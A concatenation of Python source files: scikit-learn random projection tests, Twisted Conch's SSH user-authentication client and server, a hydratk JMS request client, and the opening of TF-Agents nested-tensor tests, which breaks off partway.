# with zero mean and unit norm for each columns
A = densify(random_matrix(10000, 1, random_state=0))
assert_array_almost_equal(0, np.mean(A), 3)
assert_array_almost_equal(1.0, np.linalg.norm(A), 1)
def check_input_with_sparse_random_matrix(random_matrix):
n_components, n_features = 5, 10
for density in [-1., 0.0, 1.1]:
assert_raises(ValueError,
random_matrix, n_components, n_features, density=density)
@pytest.mark.parametrize("random_matrix", all_random_matrix)
def test_basic_property_of_random_matrix(random_matrix):
# Check basic properties of random matrix generation
check_input_size_random_matrix(random_matrix)
check_size_generated(random_matrix)
check_zero_mean_and_unit_norm(random_matrix)
@pytest.mark.parametrize("random_matrix", all_sparse_random_matrix)
def test_basic_property_of_sparse_random_matrix(random_matrix):
check_input_with_sparse_random_matrix(random_matrix)
random_matrix_dense = functools.partial(random_matrix, density=1.0)
check_zero_mean_and_unit_norm(random_matrix_dense)
def test_gaussian_random_matrix():
# Check some statical properties of Gaussian random matrix
# Check that the random matrix follow the proper distribution.
# Let's say that each element of a_{ij} of A is taken from
# a_ij ~ N(0.0, 1 / n_components).
#
n_components = 100
n_features = 1000
A = _gaussian_random_matrix(n_components, n_features, random_state=0)
assert_array_almost_equal(0.0, np.mean(A), 2)
assert_array_almost_equal(np.var(A, ddof=1), 1 / n_components, 1)
def test_sparse_random_matrix():
# Check some statical properties of sparse random matrix
n_components = 100
n_features = 500
for density in [0.3, 1.]:
s = 1 / density
A = _sparse_random_matrix(n_components,
n_features,
density=density,
random_state=0)
A = densify(A)
# Check possible values
values = np.unique(A)
assert np.sqrt(s) / np.sqrt(n_components) in values
assert - np.sqrt(s) / np.sqrt(n_components) in values
if density == 1.0:
assert np.size(values) == 2
else:
assert 0. in values
assert np.size(values) == 3
# Check that the random matrix follow the proper distribution.
# Let's say that each element of a_{ij} of A is taken from
#
# - -sqrt(s) / sqrt(n_components) with probability 1 / 2s
# - 0 with probability 1 - 1 / s
# - +sqrt(s) / sqrt(n_components) with probability 1 / 2s
#
assert_almost_equal(np.mean(A == 0.0),
1 - 1 / s, decimal=2)
assert_almost_equal(np.mean(A == np.sqrt(s) / np.sqrt(n_components)),
1 / (2 * s), decimal=2)
assert_almost_equal(np.mean(A == - np.sqrt(s) / np.sqrt(n_components)),
1 / (2 * s), decimal=2)
assert_almost_equal(np.var(A == 0.0, ddof=1),
(1 - 1 / s) * 1 / s, decimal=2)
assert_almost_equal(np.var(A == np.sqrt(s) / np.sqrt(n_components),
ddof=1),
(1 - 1 / (2 * s)) * 1 / (2 * s), decimal=2)
assert_almost_equal(np.var(A == - np.sqrt(s) / np.sqrt(n_components),
ddof=1),
(1 - 1 / (2 * s)) * 1 / (2 * s), decimal=2)
###############################################################################
# tests on random projection transformer
###############################################################################
def test_sparse_random_projection_transformer_invalid_density():
for RandomProjection in all_SparseRandomProjection:
assert_raises(ValueError,
RandomProjection(density=1.1).fit, data)
assert_raises(ValueError,
RandomProjection(density=0).fit, data)
assert_raises(ValueError,
RandomProjection(density=-0.1).fit, data)
def test_random_projection_transformer_invalid_input():
for RandomProjection in all_RandomProjection:
assert_raises(ValueError,
RandomProjection(n_components='auto').fit, [[0, 1, 2]])
assert_raises(ValueError,
RandomProjection(n_components=-10).fit, data)
def test_try_to_transform_before_fit():
for RandomProjection in all_RandomProjection:
assert_raises(ValueError,
RandomProjection(n_components='auto').transform, data)
def test_too_many_samples_to_find_a_safe_embedding():
data, _ = make_sparse_random_data(1000, 100, 1000)
for RandomProjection in all_RandomProjection:
rp = RandomProjection(n_components='auto', eps=0.1)
expected_msg = (
'eps=0.100000 and n_samples=1000 lead to a target dimension'
' of 5920 which is larger than the original space with'
' n_features=100')
assert_raise_message(ValueError, expected_msg, rp.fit, data)
def test_random_projection_embedding_quality():
data, _ = make_sparse_random_data(8, 5000, 15000)
eps = 0.2
original_distances = euclidean_distances(data, squared=True)
original_distances = original_distances.ravel()
non_identical = original_distances != 0.0
# remove 0 distances to avoid division by 0
original_distances = original_distances[non_identical]
for RandomProjection in all_RandomProjection:
rp = RandomProjection(n_components='auto', eps=eps, random_state=0)
projected = rp.fit_transform(data)
projected_distances = euclidean_distances(projected, squared=True)
projected_distances = projected_distances.ravel()
# remove 0 distances to avoid division by 0
projected_distances = projected_distances[non_identical]
distances_ratio = projected_distances / original_distances
# check that the automatically tuned values for the density respect the
# contract for eps: pairwise distances are preserved according to the
# Johnson-Lindenstrauss lemma
assert distances_ratio.max() < 1 + eps
assert 1 - eps < distances_ratio.min()
def test_SparseRandomProjection_output_representation():
for SparseRandomProjection in all_SparseRandomProjection:
# when using sparse input, the projected data can be forced to be a
# dense numpy array
rp = SparseRandomProjection(n_components=10, dense_output=True,
random_state=0)
rp.fit(data)
assert isinstance(rp.transform(data), np.ndarray)
sparse_data = sp.csr_matrix(data)
assert isinstance(rp.transform(sparse_data), np.ndarray)
# the output can be left to a sparse matrix instead
rp = SparseRandomProjection(n_components=10, dense_output=False,
random_state=0)
rp = rp.fit(data)
# output for dense input will stay dense:
assert isinstance(rp.transform(data), np.ndarray)
# output for sparse output will be sparse:
assert sp.issparse(rp.transform(sparse_data))
def test_correct_RandomProjection_dimensions_embedding():
for RandomProjection in all_RandomProjection:
rp = RandomProjection(n_components='auto',
random_state=0,
eps=0.5).fit(data)
# the number of components is adjusted from the shape of the training
# set
assert rp.n_components == 'auto'
assert rp.n_components_ == 110
if RandomProjection in all_SparseRandomProjection:
assert rp.density == 'auto'
assert_almost_equal(rp.density_, 0.03, 2)
assert rp.components_.shape == (110, n_features)
projected_1 = rp.transform(data)
assert projected_1.shape == (n_samples, 110)
# once the RP is 'fitted' the projection is always the same
projected_2 = rp.transform(data)
assert_array_equal(projected_1, projected_2)
# fit transform with same random seed will lead to the same results
rp2 = RandomProjection(random_state=0, eps=0.5)
projected_3 = rp2.fit_transform(data)
assert_array_equal(projected_1, projected_3)
# Try to transform with an input X of size different from fitted.
assert_raises(ValueError, rp.transform, data[:, 1:5])
# it is also possible to fix the number of components and the density
# level
if RandomProjection in all_SparseRandomProjection:
rp = RandomProjection(n_components=100, density=0.001,
random_state=0)
projected = rp.fit_transform(data)
assert projected.shape == (n_samples, 100)
assert rp.components_.shape == (100, n_features)
assert rp.components_.nnz < 115 # close to 1% density
assert 85 < rp.components_.nnz # close to 1% density
def test_warning_n_components_greater_than_n_features():
n_features = 20
data, _ = make_sparse_random_data(5, n_features, int(n_features / 4))
for RandomProjection in all_RandomProjection:
assert_warns(DataDimensionalityWarning,
RandomProjection(n_components=n_features + 1).fit, data)
def test_works_with_sparse_data():
n_features = 20
data, _ = make_sparse_random_data(5, n_features, int(n_features / 4))
for RandomProjection in all_RandomProjection:
rp_dense = RandomProjection(n_components=3,
random_state=1).fit(data)
rp_sparse = RandomProjection(n_components=3,
random_state=1).fit(sp.csr_matrix(data))
assert_array_almost_equal(densify(rp_dense.components_),
densify(rp_sparse.components_))
|
|
# -*- test-case-name: twisted.conch.test.test_userauth -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Implementation of the ssh-userauth service.
Currently implemented authentication types are public-key and password.
Maintainer: Paul Swartz
"""
from __future__ import absolute_import, division
import struct
from twisted.conch import error, interfaces
from twisted.conch.ssh import keys, transport, service
from twisted.conch.ssh.common import NS, getNS
from twisted.cred import credentials
from twisted.cred.error import UnauthorizedLogin
from twisted.internet import defer, reactor
from twisted.python import failure, log
from twisted.python.compat import nativeString, _bytesChr as chr
class SSHUserAuthServer(service.SSHService):
"""
A service implementing the server side of the 'ssh-userauth' service. It
is used to authenticate the user on the other side as being able to access
this server.
@ivar name: the name of this service: 'ssh-userauth'
@type name: L{bytes}
@ivar authenticatedWith: a list of authentication methods that have
already been used.
@type authenticatedWith: L{list}
@ivar loginTimeout: the number of seconds we wait before disconnecting
the user for taking too long to authenticate
@type loginTimeout: L{int}
@ivar attemptsBeforeDisconnect: the number of failed login attempts we
allow before disconnecting.
@type attemptsBeforeDisconnect: L{int}
@ivar loginAttempts: the number of login attempts that have been made
@type loginAttempts: L{int}
@ivar passwordDelay: the number of seconds to delay when the user gives
an incorrect password
@type passwordDelay: L{int}
@ivar interfaceToMethod: a L{dict} mapping credential interfaces to
authentication methods. The server checks to see which of the
cred interfaces have checkers and tells the client that those methods
are valid for authentication.
@type interfaceToMethod: L{dict}
@ivar supportedAuthentications: A list of the supported authentication
methods.
@type supportedAuthentications: L{list} of L{bytes}
@ivar user: the last username the client tried to authenticate with
@type user: L{bytes}
@ivar method: the current authentication method
@type method: L{bytes}
@ivar nextService: the service the user wants started after authentication
has been completed.
@type nextService: L{bytes}
@ivar portal: the L{twisted.cred.portal.Portal} we are using for
authentication
@type portal: L{twisted.cred.portal.Portal}
@ivar clock: an object with a callLater method. Stubbed out for testing.
"""
name = b'ssh-userauth'
loginTimeout = 10 * 60 * 60
# 10 minutes before we disconnect them
attemptsBeforeDisconnect = 20
# 20 login attempts before a disconnect
passwordDelay = 1 # number of seconds to delay on a failed password
clock = reactor
interfaceToMethod = {
credentials.ISSHPrivateKey : b'publickey',
credentials.IUsernamePassword : b'password',
}
def serviceStarted(self):
"""
Called when the userauth service is started. Set up instance
variables, check if we should allow password authentication (only
allow if the outgoing connection is encrypted) and set up a login
timeout.
"""
self.authenticatedWith = []
self.loginAttempts = 0
self.user = None
self.nextService = None
self.portal = self.transport.factory.portal
self.supportedAuthentications = []
for i in self.portal.listCredentialsInterfaces():
if i in self.interfaceToMethod:
self.supportedAuthentications.append(self.interfaceToMethod[i])
if not self.transport.isEncrypted('in'):
# don't let us transport password in plaintext
if b'password' in self.supportedAuthentications:
self.supportedAuthentications.remove(b'password')
self._cancelLoginTimeout = self.clock.callLater(
self.loginTimeout,
self.timeoutAuthentication)
def serviceStopped(self):
"""
Called when the userauth service is stopped. Cancel the login timeout
if it's still going.
"""
if self._cancelLoginTimeout:
self._cancelLoginTimeout.cancel()
self._cancelLoginTimeout = None
def timeoutAuthentication(self):
"""
Called when the user has timed out on authentication. Disconnect
with a DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE message.
"""
self._cancelLoginTimeout = None
self.transport.sendDisconnect(
transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
b'you took too long')
def tryAuth(self, kind, user, data):
"""
Try to authenticate the user with the given method. Dispatches to a
auth_* method.
@param kind: the authentication method to try.
@type kind: L{bytes}
@param user: the username the client is authenticating with.
@type user: L{bytes}
@param data: authentication specific data sent by the client.
@type data: L{bytes}
@return: A Deferred called back if the method succeeded, or erred back
if it failed.
@rtype: C{defer.Deferred}
"""
log.msg('%r trying auth %r' % (user, kind))
if kind not in self.supportedAuthentications:
return defer.fail(
error.ConchError('unsupported authentication, failing'))
kind = nativeString(kind.replace(b'-', b'_'))
f = getattr(self, 'auth_%s' % (kind,), None)
if f:
ret = f(data)
if not ret:
return defer.fail(
error.ConchError(
'%s return None instead of a Deferred'
% (kind, )))
else:
return ret
return defer.fail(error.ConchError('bad auth type: %s' % (kind,)))
def ssh_USERAUTH_REQUEST(self, packet):
"""
The client has requested authentication. Payload::
string user
string next service
string method
<authentication specific data>
@type packet: L{bytes}
"""
user, nextService, method, rest = getNS(packet, 3)
if user != self.user or nextService != self.nextService:
self.authenticatedWith = [] # clear auth state
self.user = user
self.nextService = nextService
self.method = method
d = self.tryAuth(method, user, rest)
if not d:
self._ebBadAuth(
failure.Failure(error.ConchError('auth returned none')))
return
d.addCallback(self._cbFinishedAuth)
d.addErrback(self._ebMaybeBadAuth)
d.addErrback(self._ebBadAuth)
return d
def _cbFinishedAuth(self, result):
"""
The callback when user has successfully been authenticated. For a
description of the arguments, see L{twisted.cred.portal.Portal.login}.
We start the service requested by the user.
"""
(interface, avatar, logout) = result
self.transport.avatar = avatar
self.transport.logoutFunction = logout
service = self.transport.factory.getService(self.transport,
self.nextService)
if not service:
raise error.ConchError('could not get next service: %s'
% self.nextService)
log.msg('%r authenticated with %r' % (self.user, self.method))
self.transport.sendPacket(MSG_USERAUTH_SUCCESS, b'')
self.transport.setService(service())
def _ebMaybeBadAuth(self, reason):
"""
An intermediate errback. If the reason is
error.NotEnoughAuthentication, we send a MSG_USERAUTH_FAILURE, but
with the partial success indicator set.
@type reason: L{twisted.python.failure.Failure}
"""
reason.trap(error.NotEnoughAuthentication)
self.transport.sendPacket(MSG_USERAUTH_FAILURE,
NS(b','.join(self.supportedAuthentications)) + b'\xff')
def _ebBadAuth(self, reason):
"""
The final errback in the authentication chain. If the reason is
error.IgnoreAuthentication, we simply return; the authentication
method has sent its own response. Otherwise, send a failure message
and (if the method is not 'none') increment the number of login
attempts.
@type reason: L{twisted.python.failure.Failure}
"""
if reason.check(error.IgnoreAuthentication):
return
if self.method != b'none':
log.msg('%r failed auth %r' % (self.user, self.method))
if reason.check(UnauthorizedLogin):
log.msg('unauthorized login: %s' % reason.getErrorMessage())
elif reason.check(error.ConchError):
log.msg('reason: %s' % reason.getErrorMessage())
else:
log.msg(reason.getTraceback())
self.loginAttempts += 1
if self.loginAttempts > self.attemptsBeforeDisconnect:
self.transport.sendDisconnect(
transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
b'too many bad auths')
return
self.transport.sendPacket(
MSG_USERAUTH_FAILURE,
NS(b','.join(self.supportedAuthentications)) + b'\x00')
def auth_publickey(self, packet):
"""
Public key authentication. Payload::
byte has signature
string algorithm name
string key blob
[string signature] (if has signature is True)
Create a SSHPublicKey credential and verify it using our portal.
"""
hasSig = ord(packet[0:1])
algName, blob, rest = getNS(packet[1:], 2)
pubKey = keys.Key.fromString(blob)
signature = hasSig and getNS(rest)[0] or None
if hasSig:
b = (NS(self.transport.sessionID) + chr(MSG_USERAUTH_REQUEST) +
NS(self.user) + NS(self.nextService) + NS(b'publickey') +
chr(hasSig) + NS(pubKey.sshType()) + NS(blob))
c = credentials.SSHPrivateKey(self.user, algName, blob, b,
signature)
return self.portal.login(c, None, interfaces.IConchUser)
else:
c = credentials.SSHPrivateKey(self.user, algName, blob, None, None)
return self.portal.login(c, None,
interfaces.IConchUser).addErrback(self._ebCheckKey,
packet[1:])
def _ebCheckKey(self, reason, packet):
"""
Called back if the user did not sent a signature. If reason is
error.ValidPublicKey then this key is valid for the user to
authenticate with. Send MSG_USERAUTH_PK_OK.
"""
reason.trap(error.ValidPublicKey)
# if we make it here, it means that the publickey is valid
self.transport.sendPacket(MSG_USERAUTH_PK_OK, packet)
return failure.Failure(error.IgnoreAuthentication())
def auth_password(self, packet):
"""
Password authentication. Payload::
string password
Make a UsernamePassword credential and verify it with our portal.
"""
password = getNS(packet[1:])[0]
c = credentials.UsernamePassword(self.user, password)
return self.portal.login(c, None, interfaces.IConchUser).addErrback(
self._ebPassword)
def _ebPassword(self, f):
"""
If the password is invalid, wait before sending the failure in order
to delay brute-force password guessing.
"""
d = defer.Deferred()
self.clock.callLater(self.passwordDelay, d.callback, f)
return d
class SSHUserAuthClient(service.SSHService):
"""
A service implementing the client side of 'ssh-userauth'.
This service will try all authentication methods provided by the server,
making callbacks for more information when necessary.
@ivar name: the name of this service: 'ssh-userauth'
@type name: L{str}
@ivar preferredOrder: a list of authentication methods that should be used
first, in order of preference, if supported by the server
@type preferredOrder: L{list}
@ivar user: the name of the user to authenticate as
@type user: L{bytes}
@ivar instance: the service to start after authentication has finished
@type instance: L{service.SSHService}
@ivar authenticatedWith: a list of strings of authentication methods we've tried
@type authenticatedWith: L{list} of L{bytes}
@ivar triedPublicKeys: a list of public key objects that we've tried to
authenticate with
@type triedPublicKeys: L{list} of L{Key}
@ivar lastPublicKey: the last public key object we've tried to authenticate
with
@type lastPublicKey: L{Key}
"""
name = b'ssh-userauth'
preferredOrder = [b'publickey', b'password', b'keyboard-interactive']
def __init__(self, user, instance):
self.user = user
self.instance = instance
def serviceStarted(self):
self.authenticatedWith = []
self.triedPublicKeys = []
self.lastPublicKey = None
self.askForAuth(b'none', b'')
def askForAuth(self, kind, extraData):
"""
Send a MSG_USERAUTH_REQUEST.
@param kind: the authentication method to try.
@type kind: L{bytes}
@param extraData: method-specific data to go in the packet
@type extraData: L{bytes}
"""
self.lastAuth = kind
self.transport.sendPacket(MSG_USERAUTH_REQUEST, NS(self.user) +
NS(self.instance.name) + NS(kind) + extraData)
def tryAuth(self, kind):
"""
Dispatch to an authentication method.
@param kind: the authentication method
@type kind: L{bytes}
"""
kind = nativeString(kind.replace(b'-', b'_'))
log.msg('trying to auth with %s' % (kind,))
f = getattr(self,'auth_%s' % (kind,), None)
if f:
return f()
def _ebAuth(self, ignored, *args):
"""
Generic callback for a failed authentication attempt. Respond by
asking for the list of accepted methods (the 'none' method)
"""
self.askForAuth(b'none', b'')
def ssh_USERAUTH_SUCCESS(self, packet):
"""
We received a MSG_USERAUTH_SUCCESS. The server has accepted our
authentication, so start the next service.
"""
self.transport.setService(self.instance)
def ssh_USERAUTH_FAILURE(self, packet):
"""
We received a MSG_USERAUTH_FAILURE. Payload::
string methods
byte partial success
If partial success is C{True}, then the previous method succeeded but is
not sufficient for authentication. C{methods} is a comma-separated list
of accepted authentication methods.
We sort the list of methods by their position in C{self.preferredOrder},
removing methods that have already succeeded. We then call
C{self.tryAuth} with the most preferred method.
@param packet: the C{MSG_USERAUTH_FAILURE} payload.
@type packet: L{bytes}
@return: a L{defer.Deferred} that will be callbacked with L{None} as
soon as all authentication methods have been tried, or L{None} if no
more authentication methods are available.
@rtype: C{defer.Deferred} or L{None}
"""
canContinue, partial = getNS(packet)
partial = ord(partial)
if partial:
self.authenticatedWith.append(self.lastAuth)
def orderByPreference(meth):
"""
Invoked once per authentication method in order to extract a
comparison key which is then used for sorting.
@param meth: the authentication method.
@type meth: L{bytes}
@return: the comparison key for C{meth}.
@rtype: L{int}
"""
if meth in self.preferredOrder:
return self.preferredOrder.index(meth)
else:
# put the element at the end of the list.
return len(self.preferredOrder)
canContinue = sorted([meth for meth in canContinue.split(b',')
if meth not in self.authenticatedWith],
key=orderByPreference)
log.msg('can continue with: %s' % canContinue)
return self._cbUserauthFailure(None, iter(canContinue))
def _cbUserauthFailure(self, result, iterator):
if result:
return
try:
method = next(iterator)
except StopIteration:
self.transport.sendDisconnect(
transport.DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE,
b'no more authentication methods available')
else:
d = defer.maybeDeferred(self.tryAuth, method)
d.addCallback(self._cbUserauthFailure, iterator)
return d
def ssh_USERAUTH_PK_OK(self, packet):
"""
This message (number 60) can mean several different messages depending
on the current authentication type. We dispatch to individual methods
in order to handle this request.
"""
func = getattr(self, 'ssh_USERAUTH_PK_OK_%s' %
nativeString(self.lastAuth.replace(b'-', b'_')), None)
if func is not None:
return func(packet)
else:
self.askForAuth(b'none', b'')
def ssh_USERAUTH_PK_OK_publickey(self, packet):
"""
This is MSG_USERAUTH_PK. Our public key is valid, so we create a
signature and try to authenticate with it.
"""
publicKey = self.lastPublicKey
b = (NS(self.transport.sessionID) + chr(MSG_USERAUTH_REQUEST) +
NS(self.user) + NS(self.instance.name) + NS(b'publickey') +
b'\x01' + NS(publicKey.sshType()) + NS(publicKey.blob()))
d = self.signData(publicKey, b)
if not d:
self.askForAuth(b'none', b'')
# this will fail, we'll move on
return
d.addCallback(self._cbSignedData)
d.addErrback(self._ebAuth)
def ssh_USERAUTH_PK_OK_password(self, packet):
"""
This is MSG_USERAUTH_PASSWD_CHANGEREQ. The password given has expired.
We ask for an old password and a new password, then send both back to
the server.
"""
prompt, language, rest = getNS(packet, 2)
self._oldPass = self._newPass = None
d = self.getPassword(b'Old Password: ')
d = d.addCallbacks(self._setOldPass, self._ebAuth)
d.addCallback(lambda ignored: self.getPassword(prompt))
d.addCallbacks(self._setNewPass, self._ebAuth)
def ssh_USERAUTH_PK_OK_keyboard_interactive(self, packet):
"""
This is MSG_USERAUTH_INFO_RESPONSE. The server has sent us the
questions it wants us to answer, so we ask the user and sent the
responses.
"""
name, instruction, lang, data = getNS(packet, 3)
numPrompts = struct.unpack('!L', data[:4])[0]
data = data[4:]
prompts = []
for i in range(numPrompts):
prompt, data = getNS(data)
echo = bool(ord(data[0:1]))
data = data[1:]
prompts.append((prompt, echo))
d = self.getGenericAnswers(name, instruction, prompts)
d.addCallback(self._cbGenericAnswers)
d.addErrback(self._ebAuth)
def _cbSignedData(self, signedData):
"""
Called back out of self.signData with the signed data. Send the
authentication request with the signature.
@param signedData: the data signed by the user's private key.
@type signedData: L{bytes}
"""
publicKey = self.lastPublicKey
self.askForAuth(b'publickey', b'\x01' + NS(publicKey.sshType()) +
NS(publicKey.blob()) + NS(signedData))
def _setOldPass(self, op):
"""
Called back when we are choosing a new password. Simply store the old
password for now.
@param op: the old password as entered by the user
@type op: L{bytes}
"""
self._oldPass = op
def _setNewPass(self, np):
"""
Called back when we are choosing a new password. Get the old password
and send the authentication message with both.
@param np: the new password as entered by the user
@type np: L{bytes}
"""
op = self._oldPass
self._oldPass = None
self.askForAuth(b'password', b'\xff' + NS(op) + NS(np))
def _cbGenericAnswers(self, responses):
"""
Called back when we are finished answering keyboard-interactive
questions. Send the info back to the server in a
MSG_USERAUTH_INFO_RESPONSE.
@param responses: a list of L{bytes} responses
@type responses: L{list}
"""
data = struct.pack('!L', len(responses))
for r in responses:
data += NS(r.encode('UTF8'))
self.transport.sendPacket(MSG_USERAUTH_INFO_RESPONSE, data)
def auth_publickey(self):
"""
Try to authenticate with a public key. Ask the user for a public key;
if the user has one, send the request to the server and return True.
Otherwise, return False.
@rtype: L{bool}
"""
d = defer.maybeDeferred(self.getPublicKey)
d.addBoth(self._cbGetPublicKey)
return d
def _cbGetPublicKey(self, publicKey):
if not isinstance(publicKey, keys.Key): # failure or None
publicKey = None
if publicKey is not None:
self.lastPublicKey = publicKey
self.triedPublicKeys.append(publicKey)
log.msg('using key of type %s' % publicKey.type())
self.askForAuth(b'publickey', b'\x00' + NS(publicKey.sshType()) +
NS(publicKey.blob()))
return True
else:
return False
def auth_password(self):
"""
Try to authenticate with a password. Ask the user for a password.
If the user will return a password, return True. Otherwise, return
False.
@rtype: L{bool}
"""
d = self.getPassword()
if d:
d.addCallbacks(self._cbPassword, self._ebAuth)
return True
else: # returned None, don't do password auth
return False
def auth_keyboard_interactive(self):
"""
Try to authenticate with keyboard-interactive authentication. Send
the request to the server and return True.
@rtype: L{bool}
"""
log.msg('authing with keyboard-interactive')
self.askForAuth(b'keyboard-interactive', NS(b'') + NS(b''))
return True
def _cbPassword(self, password):
"""
Called back when the user gives a password. Send the request to the
server.
@param password: the password the user entered
@type password: L{bytes}
"""
self.askForAuth(b'password', b'\x00' + NS(password))
def signData(self, publicKey, signData):
"""
Sign the given data with the given public key.
By default, this will call getPrivateKey to get the private key,
then sign the data using Key.sign().
This method is factored out so that it can be overridden to use
alternate methods, such as a key agent.
@param publicKey: The public key object returned from L{getPublicKey}
@type publicKey: L{keys.Key}
@param signData: the data to be signed by the private key.
@type signData: L{bytes}
@return: a Deferred that's called back with the signature
@rtype: L{defer.Deferred}
"""
key = self.getPrivateKey()
if not key:
return
return key.addCallback(self._cbSignData, signData)
def _cbSignData(self, privateKey, signData):
"""
Called back when the private key is returned. Sign the data and
return the signature.
@param privateKey: the private key object
@type publicKey: L{keys.Key}
@param signData: the data to be signed by the private key.
@type signData: L{bytes}
@return: the signature
@rtype: L{bytes}
"""
return privateKey.sign(signData)
def getPublicKey(self):
"""
Return a public key for the user. If no more public keys are
available, return L{None}.
This implementation always returns L{None}. Override it in a
subclass to actually find and return a public key object.
@rtype: L{Key} or L{None}
"""
return None
def getPrivateKey(self):
"""
Return a L{Deferred} that will be called back with the private key
object corresponding to the last public key from getPublicKey().
If the private key is not available, errback on the Deferred.
@rtype: L{Deferred} called back with L{Key}
"""
return defer.fail(NotImplementedError())
def getPassword(self, prompt = None):
"""
Return a L{Deferred} that will be called back with a password.
prompt is a string to display for the password, or None for a generic
'user@hostname's password: '.
@type prompt: L{bytes}/L{None}
@rtype: L{defer.Deferred}
"""
return defer.fail(NotImplementedError())
def getGenericAnswers(self, name, instruction, prompts):
"""
Returns a L{Deferred} with the responses to the promopts.
@param name: The name of the authentication currently in progress.
@param instruction: Describes what the authentication wants.
@param prompts: A list of (prompt, echo) pairs, where prompt is a
string to display and echo is a boolean indicating whether the
user's response should be echoed as they type it.
"""
return defer.fail(NotImplementedError())
MSG_USERAUTH_REQUEST = 50
MSG_USERAUTH_FAILURE = 51
MSG_USERAUTH_SUCCESS = 52
MSG_USERAUTH_BANNER = 53
MSG_USERAUTH_INFO_RESPONSE = 61
MSG_USERAUTH_PK_OK = 60
messages = {}
for k, v in list(locals().items()):
if k[:4] == 'MSG_':
messages[v] = k
SSHUserAuthServer.protocolMessages = messages
SSHUserAuthClient.protocolMessages = messages
del messages
del v
# Doubles, not included in the protocols' mappings
MSG_USERAUTH_PASSWD_CHANGEREQ = 60
MSG_USERAUTH_INFO_REQUEST = 60
|
|
# -*- coding: utf-8 -*-
"""Simple JMS client for request based processing
.. module:: network.jms.simplejms
:platform: Unix
:synopsis: Simple JMS client for request based processing
.. moduleauthor:: Petr Czaderna <pc@hydratk.org>
"""
from hydratk.lib.network.jms import jms_client
from hydratk.lib.system import fs
class JMSClient(jms_client.JMSClient, object):
"""Class JMSClient
"""
_request = None
_response = None
@property
def request(self):
""" request property getter, setter """
return self._request
@request.setter
def request(self, req):
""" request property setter """
self._request = req
@property
def response(self):
""" response property getter """
return self._response
def send(self, jms_correlation_id):
"""Methods sends message
Args:
jms_correlation_id (str): JMSCorrelationID
Returns:
bool: result
"""
return jms_client.JMSClient.send(
self,
self._request.destination_queue,
self._request.message.content,
headers={'JMSType': self._request.jms_type,
'JMSCorrelationID': jms_correlation_id}
)
class JMSRequest(object):
"""Class JMSRequest
"""
_msg = None
_destination_queue = None
_jms_type = None
def __init__(self, destination_queue, jms_type):
"""Class constructor
Called when object is initialized
Args:
destination_queue (str): queue
jms_type (str): JMSType
"""
self._destination_queue = destination_queue
self._jms_type = jms_type
@property
def destination_queue(self):
""" destination_queue property getter, setter """
return self._destination_queue
@destination_queue.setter
def destination_queue(self, queue):
""" destination queue property setter """
self._destination_queue = queue
@property
def jms_type(self):
""" jms_type property getter, setter """
return self._jms_type
@jms_type.setter
def jms_type(self, type):
""" jms_type property setter """
self._jms_type = type
@property
def msg(self):
""" msg property getter, setter """
return self._msg
@msg.setter
def msg(self, msg):
""" msg property setter """
self._msg = msg
@property
def message(self):
""" message property getter, setter """
return self._msg
@message.setter
def message(self, msg):
""" message property setter """
self._msg = msg
class JMSRequestMessage(object):
"""Class JMSRequestMessage
"""
_bind_lchr = '['
_bind_rchr = ']'
_content = None
def __init__(self, content=None, source='file'):
"""Class constructor
Called when object is initialized
Args:
content (str): filename including path if source=file
message content if source=str
source (str): content source, file|str
"""
if content is not None:
if source == 'file':
self.load_from_file(content)
if source == 'str':
self._content = content
@property
def content(self):
""" content property getter, setter """
return self._content
@content.setter
def content(self, content):
""" content property setter """
self._content = content
def load_from_file(self, msg_file):
"""Methods loads message content from file
Args:
msg_file (str): filename including path
Returns:
void
"""
self._content = fs.file_get_contents(msg_file)
def bind_var(self, *args, **kwargs):
"""Methods binds input data to message template
Args:
args (arg): arguments
kwargs (kwargs): key value arguments
Returns:
void
"""
if self._content is not None:
content = str(self._content)
for bdata in args:
for var, value in bdata.items():
bind_var = '{bind_lchr}{var}{bind_rchr}'.format(
bind_lchr=self._bind_lchr, var=var, bind_rchr=self._bind_rchr)
content = content.replace(str(bind_var), str(value))
for var, value in kwargs.items():
bind_var = '{bind_lchr}{var}{bind_rchr}'.format(
bind_lchr=self._bind_lchr, var=var, bind_rchr=self._bind_rchr)
content = content.replace(str(bind_var), str(value))
self._content = content
class JMSResponse(object):
pass
|
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tf_agents.utils.nest_utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import tensorflow as tf
from tf_agents.specs import array_spec
from tf_agents.specs import tensor_spec
from tf_agents.utils import nest_utils
# We use this to build {Dict,Tuple,List}Wrappers for testing nesting code.
from tensorflow.python.training.tracking import data_structures # pylint: disable=g-direct-tensorflow-import # TF internal
# pylint: disable=invalid-name
DictWrapper = data_structures.wrap_or_unwrap
TupleWrapper = data_structures.wrap_or_unwrap
# pylint: enable=invalid-name
class NestedTensorsTest(tf.test.TestCase):
"""Tests functions related to nested tensors."""
def nest_spec(self, shape=(2, 3), dtype=tf.float32, include_sparse=True):
spec = {
'tensor_spec_1':
tensor_spec.TensorSpec(shape, dtype),
'bounded_spec_1':
tensor_spec.BoundedTensorSpec(shape, dtype, -10, 10),
'dict_spec': {
'tensor_spec_2':
tensor_spec.TensorSpec(shape, dtype),
'bounded_spec_2':
tensor_spec.BoundedTensorSpec(shape, dtype, -10, 10)
},
'tuple_spec': (
tensor_spec.TensorSpec(shape, dtype),
tensor_spec.BoundedTensorSpec(shape, dtype, -10, 10),
),
'list_spec': [
tensor_spec.TensorSpec(shape, dtype),
(tensor_spec.TensorSpec(shape, dtype),
tensor_spec.BoundedTensorSpec(shape, dtype, -10, 10)),
],
'sparse_tensor_spec': tf.SparseTensorSpec(
shape=shape, dtype=dtype)
}
if not include_sparse:
del spec['sparse_tensor_spec']
return spec
def zeros_from_spec(self, spec, batch_size=None, extra_sizes=None):
"""Return tensors matching spec with desired additional dimensions.
Args:
